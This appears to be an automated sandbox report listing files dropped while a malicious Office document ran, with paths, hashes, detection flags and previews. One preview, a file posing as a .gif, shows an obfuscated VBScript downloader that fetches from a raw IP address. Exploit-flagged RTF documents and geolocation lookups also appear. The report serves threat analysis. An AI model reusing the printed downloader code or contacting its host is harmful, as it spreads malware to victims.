MD5:	0BC773C62D3B66587EE0FB4909245D5B
SHA1:	3338B774139FB7A8F3BCBA3E18061EC9E5F75CD9
SHA-256:	EC3535EAD0ABA05D69663DAB705EA8D00108F2D243EC7A4407CDCF22716CB182
SHA-512:	E53A1391EBCBA2A61F0A82CF41E3A4486C3EA4DB7F760A10AE985FF788CB6557BF173E4D2608B0051B39442C239554DBE0BAECAFE8112EAF71250037E935DDBA
Malicious:	false
Reputation:	low
Preview:	......M.eFy...z3..=dT.@...a.d..S,...X.F...Fa.q............................Y.X.. .M....V..........c...E..I..*O.+j......................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	4760
Entropy (8bit):	4.834060479684549
Encrypted:	false
SSDEEP:	96:RCJ2Woe5u2k6Lm5emmXIGxgyg12jDs+un/iQLEYFjDaeWJ6KGcmXSFRLcU6/KD:cxoe5uVsm5emdOgkjDt4iWN3yBGHydcY
MD5:	838C1F472806CF4BA2A9EC49C27C2847
SHA1:	D1C63579585C4740956B099697C74AD3E7C89751
SHA-256:	40A844E6AF823D9E71A35DFEE1FF7383D8A682E9981FB70440CA47AA1F6F1FF3
SHA-512:	E784B61696AB19C5A178204A11E4012A9A29D58B3D3BF1D5648021693883FFF343C87777E7A2ADC81B833148B90B88E60948B370D2BB99DEC70C097B5C91B145
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	PSMODULECACHE............Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script...............T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Reputation:	high, very likely benign file
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\1RxrR6[1].htm

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	HTML document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	167
Entropy (8bit):	4.43745738033235
Encrypted:	false
SSDEEP:	3:qVoB3tUROGclXqyvXboAcMBXqWSZUXqXlIVLGWbRIwcWWGu:q43tISl6kXiMIWSU6XlI55bRIpfGu
MD5:	0104C301C5E02BD6148B8703D19B3A73
SHA1:	7436E0B4B1F8C222C38069890B75FA2BAF9CA620
SHA-256:	446A6087825FA73EADB045E5A2E9E2ADF7DF241B571228187728191D961DDA1F
SHA-512:	84427B656A6234A651A6D8285C103645B861A18A6C5AF4ABB5CB4F3BEB5A4F0DF4A74603A0896C7608790FBB886DC40508E92D5709F44DCA05DD46C8316D15BF
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	<html>..<head><title>301 Moved Permanently</title></head>..<body>..<center><h1>301 Moved Permanently</h1></center>..<hr><center>cloudflare</center>..</body>..</html>..

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\goodflowersandgoodreturn[1].gif

Download File

Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	3490
Entropy (8bit):	3.7408033098612847
Encrypted:	false
SSDEEP:	96:2toea9sitoeGtoe3WGwtoePtoeN9sqtoezcmcxchD9stcutoe+:2iT9vi3iYwi2ig9PikcmcxchD9Wcuin
MD5:	E86E99A78BD530A6DE63FBE95AD2B07E
SHA1:	42454AB6E23D61DAB2304F42D7CD9A89D693E7B0
SHA-256:	57F7D2614FD83C5EEB0D503BE7D0C0C8F611626011E23776763CA3E14151D8DF
SHA-512:	6778C6D244592EEAD17312D4FBA1917AC5DB6307806C7063DBD9492ED663D3A12EF842B6F44342E6B0D5A970A658BD2E49F1AF774ACABC29DE465ADA74045455
Malicious:	false
Preview:	..D.i.m. .C.d.i.q.c.n.a.G.W.p.W.s.S.x.i.G.k.R.G.h.c.e.L.L.Z.W.m.K.G.T.W.G.L.A.H.u.i.k.d.K.c.q.L.h.p.o.f.i.f.U.u.x.d.L.J.K.i.c.S.P.L.C.c.z.W.z.P.W.R.U.n.Q.t.d.N.U.o.Z.l.g.W.L.f.I.P.e.L.n.R.v.d.Z.P.W.K.B.j.L.b.e.,. .C.e.b.n.j.L.d.A.c.L.B.i.i.W.s.i.G.A.G.g.Z.N.Q.i.J.L.G.A.G.C.U.U.e.h.k.U.c.N.i.L.I.i.Q.W.i.i.G.L.U.z.W.v.W.i.b.i.e.r.O.K.A.e.W.k.P.m.Z.d.U.N.z.k.k.t.s.f.N.a.K.q.s.G.c.T.R.L.i.i.t.W.f.Z.O.z.x.W.I.L.G.G.....S.e.t. .C.d.i.q.c.n.a.G.W.p.W.s.S.x.i.G.k.R.G.h.c.e.L.L.Z.W.m.K.G.T.W.G.L.A.H.u.i.k.d.K.c.q.L.h.p.o.f.i.f.U.u.x.d.L.J.K.i.c.S.P.L.C.c.z.W.z.P.W.R.U.n.Q.t.d.N.U.o.Z.l.g.W.L.f.I.P.e.L.n.R.v.d.Z.P.W.K.B.j.L.b.e. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".M.S.X.M.L.2...S.e.r.v.e.r.X.M.L.H.T.T.P.".).....C.d.i.q.c.n.a.G.W.p.W.s.S.x.i.G.k.R.G.h.c.e.L.L.Z.W.m.K.G.T.W.G.L.A.H.u.i.k.d.K.c.q.L.h.p.o.f.i.f.U.u.x.d.L.J.K.i.c.S.P.L.C.c.z.W.z.P.W.R.U.n.Q.t.d.N.U.o.Z.l.g.W.L.f.I.P.e.L.n.R.v.d.Z.P.W.K.B.j.L.b.e...O.p.e.n. .".G.E.T.".,. .".h.t.t.p.:././.9.1...9.2...2.5.4...1.4./.U.s.e.r.s._.A.P.I./.s.y.

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\hu.hu.huhuh[1].doc

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Rich Text Format data, version 1
Category:	dropped
Size (bytes):	83851
Entropy (8bit):	2.4500162461027255
Encrypted:	false
SSDEEP:	384:FVRzY2lIoKFz1TrvJXtpkhxYy+6DWYfIYibdkBfxhHoTT:FVq2VKFVDpp2NMkf3HST
MD5:	80C1A351670E6B6D65B35AB23B0F70E2
SHA1:	AB3F6F47347247ADD8CFF5B97A51B2D6E0C8748C
SHA-256:	404AC3772A5CB4F4FFADF5F0E7EB8CE9486E90017C8F85C846DDD31F429BB0BD
SHA-512:	DD3D7D77172180E598418C674BE1F88258E629106B2EFDE4B6361541AE1F8B7863F0B82A6E12A94683160058CFA04FD28F5AC3375CDFCB384EB6F1BA03A15F86
Malicious:	true
Yara Hits:	Rule: INDICATOR_RTF_MalVer_Objects, Description: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents., Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\hu.hu.huhuh[1].doc, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	{\rtf1....{\\mzeroDesc425374384 \;}.{\825505967',[)?88.3+;6.56!%<'>+5\|0?~@?-~!+!6?97-&6%=[`9)?5/:$[[![%?~[;0\|61;13?701+!%7,:25=^/@?5\|.(.]\|<2?,0=;7))?%.6!<[_?8^9;;\|?~03_$20.@.(<!3%?..&.\|]89\|98?./#+?#!$[?21?[:=?!.&&>56[)'4<?&_\|;=./!<!?,?>?`6--3?,_88./??,[1<98#/+?0%\|;]&';]!\|<;0$??1?1?(`~!$9`6871#1.\|<%%4[+,.^8./`6<]_6+??#/.?(1\|$.7\|/+^\|^#8`?>2#5;$8?!?(=.#)&2.,3`+(?.\|-)/?^8-:.\|0;!?_4%)#?>>8?5?0`^_!5,?]?@&5.898>??#?/@$??0+#^>~.%'??85^%(9%??&`@$?'.8+,.8?2,=(`>+2)%&?.$)7,2?)88.]??)0>55\|]80.]_~76?.7%]:!.<9.]-\|+3^9)1!.,)=?`,,83`].3._0)^!\|>?5;-!.=>>.:2_-?/$?-?46$.1`,4:4]9)-:.~^/\|!7&9!)%'61~4_:9$.98989?`;,?$.?5!7&%:)#],?~178>:!&7;?$?!<,+3,4~%/%9+?37%'/?;.[+7<%;4=?5?.??>(;9@'=;2.@\|:0;=_;\|?74>@/]%7??;!.][6<3[+%4;?\|)0@$<[?^5..+8\|/!;4[..$08.??[~6_\|&~=;]&(`?9$_.(.?-5@(=(_?~~.+%=87>?\|.:%.~^2%+0`#?-0_(8+3@5%~6$~<_0)->?%2`0\|3]4%3!2.*7(96.?[2_1;916`##%.,+1'%.$:2/\|..5.#~-/^%6!<?7#$4<$_-&4(4?^%6??,$%%~;!=2$4.82'22&&$7=:#?.`\|?4134,@?:?_#1-???%<6.)1/81918.?:8)(%`_[_%?>.$.(?_>.`-9.8\|%?>?~

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\json[1].json

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	962
Entropy (8bit):	5.013811273052389
Encrypted:	false
SSDEEP:	12:tklu+mnd6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkk:qlu+KdRNuKyGX85jvXhNlT3/7AcV9Wro
MD5:	18BC6D34FABB00C1E30D98E8DAEC814A
SHA1:	D21EF72B8421AA7D1F8E8B1DB1323AA93B884C54
SHA-256:	862D5523F77D193121112B15A36F602C4439791D03E24D97EF25F3A6CBE37ED0
SHA-512:	8DF14178B08AD2EDE670572394244B5224C8B070199A4BD851245B88D4EE3D7324FC7864D180DE85221ADFBBCAACB9EE9D2A77B5931D4E878E27334BF8589D71
Malicious:	false
Preview:	{. "geoplugin_request":"8.46.123.33",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1A3B3B2D.emf

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	42976
Entropy (8bit):	3.1172860344388194
Encrypted:	false
SSDEEP:	384:y2y6NgCsO6phm4L5t/OpIvqUPpi/MHiRYHBX+RxAPnrsP7dqFE7E6a+4K:yfbXGaPPpid2uzAvrudqy7E6a+4K
MD5:	25415C5880B44F1E6A07CB0E26BA46D0
SHA1:	A3316B4F57FE2430CEB4033196A303AAF972DE04
SHA-256:	E5016FD7E97BC08B09E1C8C1A18BD3337FCC499D1E108B6677B0585637B499C8
SHA-512:	318D28DEF84E59F63D2AC3F6F95F4D8C29475BF4F85AD4EF867F802E0971E0491F5ABA3C309F15A000D9AB8EFC7175BBD608C4A06AF0B4FA0D843F7DD56022D0
Malicious:	false
Preview:	....l...........;...............~@..xW.. EMF...............................j.......................{.......F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..............................................<.......%...........%...........R...p................................@. C.a.l.i.b.r.i.........................................................D................................2%.........d.................................E..........................7......................@................C.a.l.i.b.r.i.......................................................................................dv......%...........%.......................R...p................................@."C.a.l.i.b.r.i.........................................................................................d..............................................E.............................7......................@.N..............C.a.l.i.b.r.i...........

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B1EBFA90.emf

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	1461800
Entropy (8bit):	2.4663483077573503
Encrypted:	false
SSDEEP:	1536:zsMcdn0k87FGe75557miywBGjge7xbphHbd3Acfu50y7eMGn5v1wN6z58zqbb0zl:zVpPevu50yknGvqc+lPXu50yknG/qc+8
MD5:	BF60C380F64BA23C1B6D27D8595E9617
SHA1:	B3B805828416A3D1EF699CC99F730B05E1EB37DB
SHA-256:	F53C6A15B55E82C2FC485EDFA3A52A231CB93AFA5E53771F84D3CBE41FD73D61
SHA-512:	F9EAA34EB056C6C8BA2C169F6FE272BEBF4CBC3FCAFA19C85CBB23B6BCD0ADC92C7BD655A6175C60784C3D7D5D61D808AA8ACBA9090569B2A2E957D474B5355E
Malicious:	false
Preview:	....l...........................?{...-.. EMF....(N..j.......................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................R...p.................................. C.a.l.i.b.r.i.................................................................................Y..8w.../.8w......./.........8w..........Y.........8w.....T..N../....y./.....m./.............w...............\...../.....8w....X..../

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D58E1F0C.doc

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Rich Text Format data, version 1
Category:	dropped
Size (bytes):	83851
Entropy (8bit):	2.4500162461027255
Encrypted:	false
SSDEEP:	384:FVRzY2lIoKFz1TrvJXtpkhxYy+6DWYfIYibdkBfxhHoTT:FVq2VKFVDpp2NMkf3HST
MD5:	80C1A351670E6B6D65B35AB23B0F70E2
SHA1:	AB3F6F47347247ADD8CFF5B97A51B2D6E0C8748C
SHA-256:	404AC3772A5CB4F4FFADF5F0E7EB8CE9486E90017C8F85C846DDD31F429BB0BD
SHA-512:	DD3D7D77172180E598418C674BE1F88258E629106B2EFDE4B6361541AE1F8B7863F0B82A6E12A94683160058CFA04FD28F5AC3375CDFCB384EB6F1BA03A15F86
Malicious:	true
Yara Hits:	Rule: INDICATOR_RTF_MalVer_Objects, Description: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents., Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D58E1F0C.doc, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	{\rtf1....{\\mzeroDesc425374384 \;}.{\825505967',[)?88.3+;6.56!%<'>+5\|0?~@?-~!+!6?97-&6%=[`9)?5/:$[[![%?~[;0\|61;13?701+!%7,:25=^/@?5\|.(.]\|<2?,0=;7))?%.6!<[_?8^9;;\|?~03_$20.@.(<!3%?..&.\|]89\|98?./#+?#!$[?21?[:=?!.&&>56[)'4<?&_\|;=./!<!?,?>?`6--3?,_88./??,[1<98#/+?0%\|;]&';]!\|<;0$??1?1?(`~!$9`6871#1.\|<%%4[+,.^8./`6<]_6+??#/.?(1\|$.7\|/+^\|^#8`?>2#5;$8?!?(=.#)&2.,3`+(?.\|-)/?^8-:.\|0;!?_4%)#?>>8?5?0`^_!5,?]?@&5.898>??#?/@$??0+#^>~.%'??85^%(9%??&`@$?'.8+,.8?2,=(`>+2)%&?.$)7,2?)88.]??)0>55\|]80.]_~76?.7%]:!.<9.]-\|+3^9)1!.,)=?`,,83`].3._0)^!\|>?5;-!.=>>.:2_-?/$?-?46$.1`,4:4]9)-:.~^/\|!7&9!)%'61~4_:9$.98989?`;,?$.?5!7&%:)#],?~178>:!&7;?$?!<,+3,4~%/%9+?37%'/?;.[+7<%;4=?5?.??>(;9@'=;2.@\|:0;=_;\|?74>@/]%7??;!.][6<3[+%4;?\|)0@$<[?^5..+8\|/!;4[..$08.??[~6_\|&~=;]&(`?9$_.(.?-5@(=(_?~~.+%=87>?\|.:%.~^2%+0`#?-0_(8+3@5%~6$~<_0)->?%2`0\|3]4%3!2.*7(96.?[2_1;916`##%.,+1'%.$:2/\|..5.#~-/^%6!<?7#$4<$_-&4(4?^%6??,$%%~;!=2$4.82'22&&$7=:#?.`\|?4134,@?:?_#1-???%<6.)1/81918.?:8)(%`_[_%?>.$.(?_>.`-9.8\|%?>?~

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FA6BA8DC.emf

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	1461800
Entropy (8bit):	2.4663483077573503
Encrypted:	false
SSDEEP:	1536:zsMcdn0k87FGe75557miywBGjge7xbphHbd3Acfu50y7eMGn5v1wN6z58zqbb0zl:zVpPevu50yknGvqc+lPXu50yknG/qc+8
MD5:	BF60C380F64BA23C1B6D27D8595E9617
SHA1:	B3B805828416A3D1EF699CC99F730B05E1EB37DB
SHA-256:	F53C6A15B55E82C2FC485EDFA3A52A231CB93AFA5E53771F84D3CBE41FD73D61
SHA-512:	F9EAA34EB056C6C8BA2C169F6FE272BEBF4CBC3FCAFA19C85CBB23B6BCD0ADC92C7BD655A6175C60784C3D7D5D61D808AA8ACBA9090569B2A2E957D474B5355E
Malicious:	false
Preview:	....l...........................?{...-.. EMF....(N..j.......................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................R...p.................................. C.a.l.i.b.r.i.................................................................................Y..8w.../.8w......./.........8w..........Y.........8w.....T..N../....y./.....m./.............w...............\...../.....8w....X..../

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{AB6DAD69-2E1E-438B-868F-672C91416C1F}.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	2.633221823749302
Encrypted:	false
SSDEEP:	96:mGMPCW7CgMR8en6845EJpNMPzW7CdD8en6845EJp:+PxxNfq3SPoImfq3
MD5:	D10881E3E5C343EEBC342FB3CF54F5D8
SHA1:	3B66157CCA0AF73FA92990CEDA4A5FBFE56BD492
SHA-256:	F24556B84084FCAF596F1C92DB758D85568589BD5C5EC0B3A1860242ED8DAE5E
SHA-512:	5A91C81ADE701AA7A0DA69054414D14E9C819D4E0EAE746706F768DB920A9A15D7F046A57DD46EA61204EFA26E9CD873E1A71397AB31078735552698EAB6F7B4
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{3BCD044A-0CB7-44C4-BD2D-6AE6E91208F8}.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1024
Entropy (8bit):	0.05390218305374581
Encrypted:	false
SSDEEP:	3:ol3lYdn:4Wn
MD5:	5D4D94EE7E06BBB0AF9584119797B23A
SHA1:	DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256:	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512:	95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{5247EDDA-E652-4561-8350-47119A639C55}.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	10412
Entropy (8bit):	3.6378740274366175
Encrypted:	false
SSDEEP:	192:1sSKFDb1Gd+v1Yqt/CSUpr5g70n9v1kn02zN0DdoxpPLF1W12bbaT7:yPb1GEvKqt/CSUjn9unTzCDdoxRLfFA7
MD5:	A419150D959A40D424D8B8EA28C5AFB9
SHA1:	B2A26BC4C86077D6BA2B61A037D507FC88981F33
SHA-256:	536E9ED55E80F9CB6E7B241D66C191DF462E34D956EEB6BDE870F9010F10EF87
SHA-512:	F6F38837C66348E35B01787541A955F7EF3C85DA1A2FEB17296ECC9FDB38EE22B34A38AF0BBEF4E556D9B8F9D6060E75E755840BBC989A1809F1529D30DD38A5
Malicious:	false
Preview:	......2.5.5.0.5.9.6.7.'.,.[.).?.8.8...3.+.;.6...5.6.!.%..<.'.>.+.5.\|.0.?.~.@.?.-.~..!.+..!.6.?.9.7.-.&.6.%.=.[.`.9.).?.5./.:.$.[.[.!.[.%.?.~.[.;.0.\|.6.1.;.1.3.?.7.0.1.+.!.%.7..,.:.2.5.=.^./.@.?.5.\|...(...].\|.<.2.?.,.0.=.;.7.)..).?.%...6.!.<.[._.?.8.^.9.;.;.\|.?.~.0.3._.$.2.0...@...(.<.!.3.%.?......&...\|.].8.9.\|.9.8.?.../.#.+.?.#.!.$.[.?.2.1.?.[.:.=.?.!...&.&.>.5.6.[.).'.4.<.?.&._.\|.;.=.../.!.<.!.?.,.?.>.?.`.6.-.-.3.?.,._.8.8.../.?.?.,.[.1.<.9.8.#./.+.?.0.%.\|.;.].&.'.;.].!.\|.<.;.0.$.?.?.1.?.1.?.(.`.~.!.$.9.`..6.8.7.1.#.1...\|.<.%.%.4.[.+.,...^.8.../.`.6.<.]._.6.+.?.?.#./...?.(.1.\|.$...7.\|./.+.^.\|.^.#.8.`.?.>.2.#.5.;.$..8.?..!.?.(.=....#.).&.2...,.3.`.+.(.?...\|.-.)./.?.^.8.-.:...\|.0.;.!.?._.4.%.).#.?.>.>.8.?.5.?.0.`.^._.!.5.,.?.].?.@.&..5...8.9.8.>.?.?.#.?./.@.$.?.?.0.+.#.^.>..~...%.'.?.?.8.5.^.%.(.9.%.?.?.&.`.@.$.?.'...8.+.,...8.?..2.,.=.(.`.>.+.2.).%.&.?...$.).7.,.2.?.).8.8...].?.?.).0.>.5.5.\|.].8.0...]._.~.7.6.?...7.%.].:.!...<.9...].-.\|.+.3.^.9.)..1.!...,.).=.?.`.,.,.8.3.

C:\Users\user\AppData\Local\Temp\gg4jrszi.wc1.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\lg0obywh.f2c.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\{1C2A16E6-39AA-4302-A41D-94D57ECFCBF9}

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	131072
Entropy (8bit):	0.02546787018124073
Encrypted:	false
SSDEEP:	6:I3DPcSHFnx3FvxggLRw2Aw/rRXv//4tfnRujlw//+GtluJ/eRuj:I3DPp33p8C/tvYg3J/
MD5:	0BC773C62D3B66587EE0FB4909245D5B
SHA1:	3338B774139FB7A8F3BCBA3E18061EC9E5F75CD9
SHA-256:	EC3535EAD0ABA05D69663DAB705EA8D00108F2D243EC7A4407CDCF22716CB182
SHA-512:	E53A1391EBCBA2A61F0A82CF41E3A4486C3EA4DB7F760A10AE985FF788CB6557BF173E4D2608B0051B39442C239554DBE0BAECAFE8112EAF71250037E935DDBA
Malicious:	false
Preview:	......M.eFy...z3..=dT.@...a.d..S,...X.F...Fa.q............................Y.X.. .M....V..........c...E..I..*O.+j......................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\{CD116E8E-D386-4FB9-83C5-C701206C09A7}

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	131072
Entropy (8bit):	0.025370473899404312
Encrypted:	false
SSDEEP:	6:I3DPcsKECFvxggLRHwelue23RXv//4tfnRujlw//+GtluJ/eRuj:I3DPCECprweceYvYg3J/
MD5:	D97861234E6FC58958A1818BCF35FF98
SHA1:	0AD6905DCA91C005E4CE90EB7E6AA30D9D2AC511
SHA-256:	BC8B232A73BDF423F2DC497765D2DA06AB95AA9573CBBC605953D8C91A6F296C
SHA-512:	3095AB2AF8C9B71A09E6E419C12681A25826DBDACCE92B43969A9EC4926FE055B9D67483AECE28A9F786EBFB46837AA3BC514D1BF6E1C0A0813F0BBB03EA1E91
Malicious:	false
Preview:	......M.eFy...z_U<./,qH....7M..S,...X.F...Fa.q............................P.7l...H......................K.@..A.a.....................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF304F3A1BC5902C7C.TMP

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF35CA642FF320A01C.TMP

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
